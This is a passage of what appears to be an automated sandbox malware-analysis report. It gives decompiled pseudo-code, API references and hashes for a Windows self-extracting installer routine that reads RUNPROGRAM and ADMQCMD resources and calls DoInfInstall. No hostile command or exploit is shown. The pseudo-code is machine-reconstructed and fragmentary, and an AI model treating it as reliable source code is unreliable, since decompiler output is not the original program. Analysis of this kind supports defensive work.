                                                                                                                                                                                                                                            				if( *0x328000 == 0) {
                                                                                                                                                                                                                                            					__setusermatherr(E00327000);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				E003271EF(_t6);
                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00326FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00326FC5
                                                                                                                                                                                                                                            • __set_app_type.MSVCRT ref: 003269C2
                                                                                                                                                                                                                                            • __p__fmode.MSVCRT ref: 003269D8
                                                                                                                                                                                                                                            • __p__commode.MSVCRT ref: 003269E6
                                                                                                                                                                                                                                            • __setusermatherr.MSVCRT ref: 00326A07
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1632413811-0
                                                                                                                                                                                                                                            • Opcode ID: 68fd2101088ae29bc2db762b88cd85341354b52a81e8574dac36cc5503ba2afb
                                                                                                                                                                                                                                            • Instruction ID: a3cf13c8e9c804261e4431ff2ac5bab985488fd25a8e803ce92a87bfe608c29b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 68fd2101088ae29bc2db762b88cd85341354b52a81e8574dac36cc5503ba2afb
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BEF0ACB050A711DFD77BAB34FD0A6043B69FB05731F204A1DE4619A2F1CF3A9556CA11
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00326952(CHAR* __ecx) {
                                                                                                                                                                                                                                            				long _v8;
                                                                                                                                                                                                                                            				long _v12;
                                                                                                                                                                                                                                            				long _v16;
                                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                                            				int _t22;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t22 = 0;
                                                                                                                                                                                                                                            				_v12 = 0;
                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                            				_v20 = 0;
                                                                                                                                                                                                                                            				_v16 = 0;
                                                                                                                                                                                                                                            				if( *__ecx != 0) {
                                                                                                                                                                                                                                            					_t6 =  &_v20; // 0x325760
                                                                                                                                                                                                                                            					if(GetDiskFreeSpaceA(__ecx,  &_v12,  &_v8, _t6,  &_v16) != 0) {
                                                                                                                                                                                                                                            						_t22 = MulDiv(_v8 * _v12, _v16, 0x400);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t22;
                                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetDiskFreeSpaceA.KERNEL32(0000005A,?,?,`W2,?,00000000,00325760,?,A:\), ref: 0032697F
                                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,?,00000400), ref: 00326999
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DiskFreeSpace
                                                                                                                                                                                                                                            • String ID: `W2
                                                                                                                                                                                                                                            • API String ID: 1705453755-2327545889
                                                                                                                                                                                                                                            • Opcode ID: 6a2d55e14179f802beae1f631233a7f34a36e5c20c7b9e5f345267723ca35abc
                                                                                                                                                                                                                                            • Instruction ID: 1c6376c004c4087b206f5557651107300cfa7f5d9112c6ec0dbb30906fe4e8bb
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6a2d55e14179f802beae1f631233a7f34a36e5c20c7b9e5f345267723ca35abc
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 37F0F9B6D0022CBBCB12DFE8DC45ADEBBBCEB48710F10419AE510E3240DB71AA518BD1
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                            Execution Coverage:26.9%
                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                            Signature Coverage:0%
                                                                                                                                                                                                                                            Total number of Nodes:967
                                                                                                                                                                                                                                            Total number of Limit Nodes:41
3242->3244 3243->3244 3245 10d6ce0 4 API calls 3244->3245 3246 10d1a7e 3245->3246 3247 10d7270 _except_handler4_common 3248 10d69b0 3249 10d69b5 3248->3249 3257 10d6fbe GetModuleHandleW 3249->3257 3251 10d69c1 __set_app_type __p__fmode __p__commode 3252 10d69f9 3251->3252 3253 10d6a0e 3252->3253 3254 10d6a02 __setusermatherr 3252->3254 3259 10d71ef _controlfp 3253->3259 3254->3253 3256 10d6a13 3258 10d6fcf 3257->3258 3258->3251 3259->3256 3260 10d34f0 3261 10d3504 3260->3261 3262 10d35b8 3260->3262 3261->3262 3263 10d35be GetDesktopWindow 3261->3263 3264 10d351b 3261->3264 3265 10d3526 3262->3265 3269 10d3671 EndDialog 3262->3269 3266 10d43d0 11 API calls 3263->3266 3267 10d354f 3264->3267 3268 10d351f 3264->3268 3270 10d35d6 3266->3270 3267->3265 3272 10d3559 ResetEvent 3267->3272 3268->3265 3271 10d352d TerminateThread EndDialog 3268->3271 3269->3265 3273 10d361d SetWindowTextA CreateThread 3270->3273 3274 10d35e0 GetDlgItem SendMessageA GetDlgItem SendMessageA 3270->3274 3271->3265 3275 10d44b9 20 API calls 3272->3275 3273->3265 3276 10d3646 3273->3276 3274->3273 3277 10d3581 3275->3277 3278 10d44b9 20 API calls 3276->3278 3279 10d359b SetEvent 3277->3279 3281 10d358a SetEvent 3277->3281 3278->3262 3280 10d3680 4 API calls 3279->3280 3280->3262 3281->3265 3282 10d6ef0 3283 10d6f2d 3282->3283 3285 10d6f02 3282->3285 3284 10d6f27 ?terminate@ 3284->3283 3285->3283 3285->3284

[Figure: Callgraph. Legend: Executed; Not Executed; Opacity -> Relevance; Disassembly available]

[Figure: Control-flow Graph. Legend: Executed; Not Executed]
C-Code - Quality: 82%
E010D3BA2() {
	signed int _v8;
	signed int _v12;
	char _v276;
	char _v280;
	short _v300;
	intOrPtr _v304;
	void _v348;
	char _v352;
	intOrPtr _v356;
	signed int _v360;
	short _v364;
	char* _v368;
	intOrPtr _v372;
	void* _v376;
	intOrPtr _v380;
	char _v384;
	signed int _v388;
	intOrPtr _v392;
	signed int _v396;
	signed int _v400;
	signed int _v404;
	void* _v408;
	void* _v424;
	void* __ebx;
	void* __edi;
	void* __esi;
	signed int _t69;
	signed int _t76;
	void* _t77;
	signed int _t79;
	signed int _t97;
	signed int _t101;
	signed int _t104;
	signed int _t108;
	int _t112;
	void* _t115;
	signed char _t118;
	void* _t125;
	signed int _t127;
	void* _t128;
	struct HINSTANCE__* _t129;
	void* _t130;
	short _t137;
	char* _t140;
	signed char _t144;
	signed char _t145;
	signed int _t149;
	void* _t150;
	void* _t151;
	signed int _t153;
	void* _t155;
	void* _t156;
	signed int _t157;
	signed int _t162;
	signed int _t164;
	void* _t165;

	_t164 = (_t162 & 0xfffffff8) - 0x194;
	_t69 =  *0x10d8004; // 0xc2f4ed82
	_v8 = _t69 ^ _t164;
	_t153 = 0;
	 *0x10d9124 =  *0x10d9124 & 0;
	_t149 = 0;
	_v388 = 0;
	_v384 = 0;
	_t165 =  *0x10d8a28 - _t153; // 0x0
	if(_t165 != 0) {
		L3:
		_t127 = 0;
		_v392 = 0;
		while(1) {
			_v400 = _v400 & 0x00000000;
			memset( &_v348, 0, 0x44);
			_t164 = _t164 + 0xc;
                                                                                                                                                                                                                                            						_v348 = 0x44;
                                                                                                                                                                                                                                            						if( *0x10d8c42 != 0) {
                                                                                                                                                                                                                                            							goto L26;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t146 =  &_v396;
                                                                                                                                                                                                                                            						_t115 = E010D468F("SHOWWINDOW",  &_v396, 4);
                                                                                                                                                                                                                                            						if(_t115 == 0 || _t115 > 4) {
                                                                                                                                                                                                                                            							L25:
                                                                                                                                                                                                                                            							_t146 = 0x4b1;
                                                                                                                                                                                                                                            							E010D44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            							 *0x10d9124 = 0x80070714;
                                                                                                                                                                                                                                            							goto L62;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							if(_v396 != 1) {
                                                                                                                                                                                                                                            								__eflags = _v396 - 2;
                                                                                                                                                                                                                                            								if(_v396 != 2) {
                                                                                                                                                                                                                                            									_t137 = 3;
                                                                                                                                                                                                                                            									__eflags = _v396 - _t137;
                                                                                                                                                                                                                                            									if(_v396 == _t137) {
                                                                                                                                                                                                                                            										_v304 = 1;
                                                                                                                                                                                                                                            										_v300 = _t137;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									goto L14;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_push(6);
                                                                                                                                                                                                                                            								_v304 = 1;
                                                                                                                                                                                                                                            								_pop(0);
                                                                                                                                                                                                                                            								goto L11;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_v304 = 1;
                                                                                                                                                                                                                                            								L11:
                                                                                                                                                                                                                                            								_v300 = 0;
                                                                                                                                                                                                                                            								L14:
                                                                                                                                                                                                                                            								if(_t127 != 0) {
                                                                                                                                                                                                                                            									L27:
                                                                                                                                                                                                                                            									_t155 = 1;
                                                                                                                                                                                                                                            									__eflags = _t127 - 1;
                                                                                                                                                                                                                                            									if(_t127 != 1) {
                                                                                                                                                                                                                                            										L31:
                                                                                                                                                                                                                                            										_t132 =  &_v280;
                                                                                                                                                                                                                                            										_t76 = E010D1AE8( &_v280,  &_v408,  &_v404); // executed
                                                                                                                                                                                                                                            										__eflags = _t76;
                                                                                                                                                                                                                                            										if(_t76 == 0) {
                                                                                                                                                                                                                                            											L62:
                                                                                                                                                                                                                                            											_t77 = 0;
                                                                                                                                                                                                                                            											L63:
                                                                                                                                                                                                                                            											_pop(_t150);
                                                                                                                                                                                                                                            											_pop(_t156);
                                                                                                                                                                                                                                            											_pop(_t128);
                                                                                                                                                                                                                                            											return E010D6CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										_t157 = _v404;
                                                                                                                                                                                                                                            										__eflags = _t149;
                                                                                                                                                                                                                                            										if(_t149 != 0) {
                                                                                                                                                                                                                                            											L37:
                                                                                                                                                                                                                                            											__eflags = _t157;
                                                                                                                                                                                                                                            											if(_t157 == 0) {
                                                                                                                                                                                                                                            												L57:
                                                                                                                                                                                                                                            												_t151 = _v408;
                                                                                                                                                                                                                                            												_t146 =  &_v352;
                                                                                                                                                                                                                                            												_t130 = _t151; // executed
                                                                                                                                                                                                                                            												_t79 = E010D3FEF(_t130,  &_v352); // executed
                                                                                                                                                                                                                                            												__eflags = _t79;
                                                                                                                                                                                                                                            												if(_t79 == 0) {
                                                                                                                                                                                                                                            													L61:
                                                                                                                                                                                                                                            													LocalFree(_t151);
                                                                                                                                                                                                                                            													goto L62;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												L58:
                                                                                                                                                                                                                                            												LocalFree(_t151);
                                                                                                                                                                                                                                            												_t127 = _t127 + 1;
                                                                                                                                                                                                                                            												_v396 = _t127;
                                                                                                                                                                                                                                            												__eflags = _t127 - 2;
                                                                                                                                                                                                                                            												if(_t127 >= 2) {
                                                                                                                                                                                                                                            													_t155 = 1;
                                                                                                                                                                                                                                            													__eflags = 1;
                                                                                                                                                                                                                                            													L69:
                                                                                                                                                                                                                                            													__eflags =  *0x10d8580;
                                                                                                                                                                                                                                            													if( *0x10d8580 != 0) {
                                                                                                                                                                                                                                            														E010D2267();
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            													_t77 = _t155;
                                                                                                                                                                                                                                            													goto L63;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												_t153 = _v392;
                                                                                                                                                                                                                                            												_t149 = _v388;
                                                                                                                                                                                                                                            												continue;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											L38:
                                                                                                                                                                                                                                            											__eflags =  *0x10d8180;
                                                                                                                                                                                                                                            											if( *0x10d8180 == 0) {
                                                                                                                                                                                                                                            												_t146 = 0x4c7;
                                                                                                                                                                                                                                            												E010D44B9(0, 0x4c7, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            												LocalFree(_v424);
                                                                                                                                                                                                                                            												 *0x10d9124 = 0x8007042b;
                                                                                                                                                                                                                                            												goto L62;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											__eflags = _t157;
                                                                                                                                                                                                                                            											if(_t157 == 0) {
                                                                                                                                                                                                                                            												goto L57;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											__eflags =  *0x10d9a34 & 0x00000004;
                                                                                                                                                                                                                                            											if(__eflags == 0) {
                                                                                                                                                                                                                                            												goto L57;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											_t129 = E010D6495(_t127, _t132, _t157, __eflags);
                                                                                                                                                                                                                                            											__eflags = _t129;
                                                                                                                                                                                                                                            											if(_t129 == 0) {
                                                                                                                                                                                                                                            												_t146 = 0x4c8;
                                                                                                                                                                                                                                            												E010D44B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
                                                                                                                                                                                                                                            												L65:
                                                                                                                                                                                                                                            												LocalFree(_v408);
                                                                                                                                                                                                                                            												 *0x10d9124 = E010D6285();
                                                                                                                                                                                                                                            												goto L62;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											_t146 = GetProcAddress(_t129, "DoInfInstall");
                                                                                                                                                                                                                                            											_v404 = _t146;
                                                                                                                                                                                                                                            											__eflags = _t146;
                                                                                                                                                                                                                                            											if(_t146 == 0) {
                                                                                                                                                                                                                                            												_t146 = 0x4c9;
                                                                                                                                                                                                                                            												__eflags = 0;
                                                                                                                                                                                                                                            												E010D44B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
                                                                                                                                                                                                                                            												FreeLibrary(_t129);
                                                                                                                                                                                                                                            												goto L65;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											__eflags =  *0x10d8a30;
                                                                                                                                                                                                                                            											_t151 = _v408;
                                                                                                                                                                                                                                            											_v384 = 0;
                                                                                                                                                                                                                                            											_v368 =  &_v280;
                                                                                                                                                                                                                                            											_v364 =  *0x10d9a40;
                                                                                                                                                                                                                                            											_t97 =  *0x10d8a38 & 0x0000ffff;
                                                                                                                                                                                                                                            											_v380 = 0x10d9154;
                                                                                                                                                                                                                                            											_v376 = _t151;
                                                                                                                                                                                                                                            											_v372 = 0x10d91e4;
                                                                                                                                                                                                                                            											_v360 = _t97;
                                                                                                                                                                                                                                            											if( *0x10d8a30 != 0) {
                                                                                                                                                                                                                                            												_t97 = _t97 | 0x00010000;
                                                                                                                                                                                                                                            												__eflags = _t97;
                                                                                                                                                                                                                                            												_v360 = _t97;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											_t144 =  *0x10d9a34;
                                                                                                                                                                                                                                            											__eflags = _t144 & 0x00000008;
                                                                                                                                                                                                                                            											if((_t144 & 0x00000008) != 0) {
                                                                                                                                                                                                                                            												_t97 = _t97 | 0x00020000;
                                                                                                                                                                                                                                            												__eflags = _t97;
                                                                                                                                                                                                                                            												_v360 = _t97;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											__eflags = _t144 & 0x00000010;
                                                                                                                                                                                                                                            											if((_t144 & 0x00000010) != 0) {
                                                                                                                                                                                                                                            												_t97 = _t97 | 0x00040000;
                                                                                                                                                                                                                                            												__eflags = _t97;
                                                                                                                                                                                                                                            												_v360 = _t97;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											_t145 =  *0x10d8d48; // 0x0
                                                                                                                                                                                                                                            											__eflags = _t145 & 0x00000040;
                                                                                                                                                                                                                                            											if((_t145 & 0x00000040) != 0) {
                                                                                                                                                                                                                                            												_t97 = _t97 | 0x00080000;
                                                                                                                                                                                                                                            												__eflags = _t97;
                                                                                                                                                                                                                                            												_v360 = _t97;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											__eflags = _t145;
                                                                                                                                                                                                                                            											if(_t145 < 0) {
                                                                                                                                                                                                                                            												_t104 = _t97 | 0x00100000;
                                                                                                                                                                                                                                            												__eflags = _t104;
                                                                                                                                                                                                                                            												_v360 = _t104;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											_v356 =  *0x10d9a38;
                                                                                                                                                                                                                                            											_t130 = _t146;
                                                                                                                                                                                                                                            											 *0x10da288( &_v384);
                                                                                                                                                                                                                                            											_t101 = _v404();
                                                                                                                                                                                                                                            											__eflags = _t164 - _t164;
                                                                                                                                                                                                                                            											if(_t164 != _t164) {
                                                                                                                                                                                                                                            												_t130 = 4;
                                                                                                                                                                                                                                            												asm("int 0x29");
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											 *0x10d9124 = _t101;
                                                                                                                                                                                                                                            											_push(_t129);
                                                                                                                                                                                                                                            											__eflags = _t101;
                                                                                                                                                                                                                                            											if(_t101 < 0) {
                                                                                                                                                                                                                                            												FreeLibrary();
                                                                                                                                                                                                                                            												goto L61;
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												FreeLibrary();
                                                                                                                                                                                                                                            												_t127 = _v400;
                                                                                                                                                                                                                                            												goto L58;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										__eflags =  *0x10d9a40 - 1;
                                                                                                                                                                                                                                            										if( *0x10d9a40 == 1) {
                                                                                                                                                                                                                                            											goto L37;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										__eflags =  *0x10d8a20;
                                                                                                                                                                                                                                            										if( *0x10d8a20 == 0) {
                                                                                                                                                                                                                                            											goto L37;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										__eflags = _t157;
                                                                                                                                                                                                                                            										if(_t157 != 0) {
                                                                                                                                                                                                                                            											goto L38;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										_v388 = 1;
                                                                                                                                                                                                                                            										E010D202A(_t146); // executed
                                                                                                                                                                                                                                            										goto L37;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									_t146 =  &_v280;
                                                                                                                                                                                                                                            									_t108 = E010D468F("POSTRUNPROGRAM",  &_v280, 0x104);
                                                                                                                                                                                                                                            									__eflags = _t108;
                                                                                                                                                                                                                                            									if(_t108 == 0) {
                                                                                                                                                                                                                                            										goto L25;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									__eflags =  *0x10d8c42;
                                                                                                                                                                                                                                            									if( *0x10d8c42 != 0) {
                                                                                                                                                                                                                                            										goto L69;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
                                                                                                                                                                                                                                            									__eflags = _t112 == 0;
                                                                                                                                                                                                                                            									if(_t112 == 0) {
                                                                                                                                                                                                                                            										goto L69;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									goto L31;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_t118 =  *0x10d8a38; // 0x0
                                                                                                                                                                                                                                            								if(_t118 == 0) {
                                                                                                                                                                                                                                            									L23:
                                                                                                                                                                                                                                            									if(_t153 != 0) {
                                                                                                                                                                                                                                            										goto L31;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									_t146 =  &_v276;
                                                                                                                                                                                                                                            									if(E010D468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
                                                                                                                                                                                                                                            										goto L27;
									}
									goto L25;
								}
								if((_t118 & 0x00000001) == 0) {
									__eflags = _t118 & 0x00000002;
									if((_t118 & 0x00000002) == 0) {
										goto L62;
									}
									_t140 = "USRQCMD";
									L20:
									_t146 =  &_v276;
									if(E010D468F(_t140,  &_v276, 0x104) == 0) {
										goto L25;
									}
									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
										_t153 = 1;
										_v388 = 1;
									}
									goto L23;
								}
								_t140 = "ADMQCMD";
								goto L20;
							}
						}
						L26:
						_push(_t130);
						_t146 = 0x104;
						E010D1781( &_v276, 0x104, _t130, 0x10d8c42);
						goto L27;
					}
				}
				_t130 = "REBOOT";
				_t125 = E010D468F(_t130, 0x10d9a2c, 4);
				if(_t125 == 0 || _t125 > 4) {
					goto L25;
				} else {
					goto L3;
				}
			}
                                                                                                                                                                                                                                            0x010d3dee
                                                                                                                                                                                                                                            0x010d3df5
                                                                                                                                                                                                                                            0x010d3fad
                                                                                                                                                                                                                                            0x010d3fb9
                                                                                                                                                                                                                                            0x010d3fc2
                                                                                                                                                                                                                                            0x010d3fc8
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3fc8
                                                                                                                                                                                                                                            0x010d3dfb
                                                                                                                                                                                                                                            0x010d3dfd
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3e03
                                                                                                                                                                                                                                            0x010d3e0a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3e15
                                                                                                                                                                                                                                            0x010d3e17
                                                                                                                                                                                                                                            0x010d3e19
                                                                                                                                                                                                                                            0x010d3f94
                                                                                                                                                                                                                                            0x010d3fa4
                                                                                                                                                                                                                                            0x010d3f7c
                                                                                                                                                                                                                                            0x010d3f80
                                                                                                                                                                                                                                            0x010d3f8b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3f8b
                                                                                                                                                                                                                                            0x010d3e2c
                                                                                                                                                                                                                                            0x010d3e30
                                                                                                                                                                                                                                            0x010d3e34
                                                                                                                                                                                                                                            0x010d3e36
                                                                                                                                                                                                                                            0x010d3f69
                                                                                                                                                                                                                                            0x010d3f6e
                                                                                                                                                                                                                                            0x010d3f70
                                                                                                                                                                                                                                            0x010d3f76
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3f76
                                                                                                                                                                                                                                            0x010d3e3c
                                                                                                                                                                                                                                            0x010d3e43
                                                                                                                                                                                                                                            0x010d3e47
                                                                                                                                                                                                                                            0x010d3e52
                                                                                                                                                                                                                                            0x010d3e5c
                                                                                                                                                                                                                                            0x010d3e61
                                                                                                                                                                                                                                            0x010d3e68
                                                                                                                                                                                                                                            0x010d3e70
                                                                                                                                                                                                                                            0x010d3e74
                                                                                                                                                                                                                                            0x010d3e7c
                                                                                                                                                                                                                                            0x010d3e80
                                                                                                                                                                                                                                            0x010d3e82
                                                                                                                                                                                                                                            0x010d3e82
                                                                                                                                                                                                                                            0x010d3e87
                                                                                                                                                                                                                                            0x010d3e87
                                                                                                                                                                                                                                            0x010d3e8b
                                                                                                                                                                                                                                            0x010d3e91
                                                                                                                                                                                                                                            0x010d3e94
                                                                                                                                                                                                                                            0x010d3e96
                                                                                                                                                                                                                                            0x010d3e96
                                                                                                                                                                                                                                            0x010d3e9b
                                                                                                                                                                                                                                            0x010d3e9b
                                                                                                                                                                                                                                            0x010d3e9f
                                                                                                                                                                                                                                            0x010d3ea2
                                                                                                                                                                                                                                            0x010d3ea4
                                                                                                                                                                                                                                            0x010d3ea4
                                                                                                                                                                                                                                            0x010d3ea9
                                                                                                                                                                                                                                            0x010d3ea9
                                                                                                                                                                                                                                            0x010d3ead
                                                                                                                                                                                                                                            0x010d3eb3
                                                                                                                                                                                                                                            0x010d3eb6
                                                                                                                                                                                                                                            0x010d3eb8
                                                                                                                                                                                                                                            0x010d3eb8
                                                                                                                                                                                                                                            0x010d3ebd
                                                                                                                                                                                                                                            0x010d3ebd
                                                                                                                                                                                                                                            0x010d3ec1
                                                                                                                                                                                                                                            0x010d3ec3
                                                                                                                                                                                                                                            0x010d3ec5
                                                                                                                                                                                                                                            0x010d3ec5
                                                                                                                                                                                                                                            0x010d3eca
                                                                                                                                                                                                                                            0x010d3eca
                                                                                                                                                                                                                                            0x010d3ed5
                                                                                                                                                                                                                                            0x010d3ed9
                                                                                                                                                                                                                                            0x010d3ee0
                                                                                                                                                                                                                                            0x010d3ee6
                                                                                                                                                                                                                                            0x010d3eea
                                                                                                                                                                                                                                            0x010d3eec
                                                                                                                                                                                                                                            0x010d3eee
                                                                                                                                                                                                                                            0x010d3ef3
                                                                                                                                                                                                                                            0x010d3ef3
                                                                                                                                                                                                                                            0x010d3ef5
                                                                                                                                                                                                                                            0x010d3efa
                                                                                                                                                                                                                                            0x010d3efb
                                                                                                                                                                                                                                            0x010d3efd
                                                                                                                                                                                                                                            0x010d3f40
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3eff
                                                                                                                                                                                                                                            0x010d3eff
                                                                                                                                                                                                                                            0x010d3f05
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3f05
                                                                                                                                                                                                                                            0x010d3efd
                                                                                                                                                                                                                                            0x010d3dc7
                                                                                                                                                                                                                                            0x010d3dce
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3dd0
                                                                                                                                                                                                                                            0x010d3dd7
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3dd9
                                                                                                                                                                                                                                            0x010d3ddb
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3ddd
                                                                                                                                                                                                                                            0x010d3de1

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 010D3C11
                                                                                                                                                                                                                                            • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 010D3CDC
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010D46A0
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: SizeofResource.KERNEL32(00000000,00000000,?,010D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46A9
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010D46C3
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: LoadResource.KERNEL32(00000000,00000000,?,010D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46CC
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: LockResource.KERNEL32(00000000,?,010D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46D3
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: memcpy_s.MSVCRT ref: 010D46E5
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46EF
                                                                                                                                                                                                                                            • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,010D8C42), ref: 010D3D8F
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 010D3E26
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,010D8C42), ref: 010D3EFF
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,?,?,?,010D8C42), ref: 010D3F1F
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,010D8C42), ref: 010D3F40
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,?,?,?,010D8C42), ref: 010D3F47
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,010D8C42), ref: 010D3F76
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,010D8C42), ref: 010D3F80
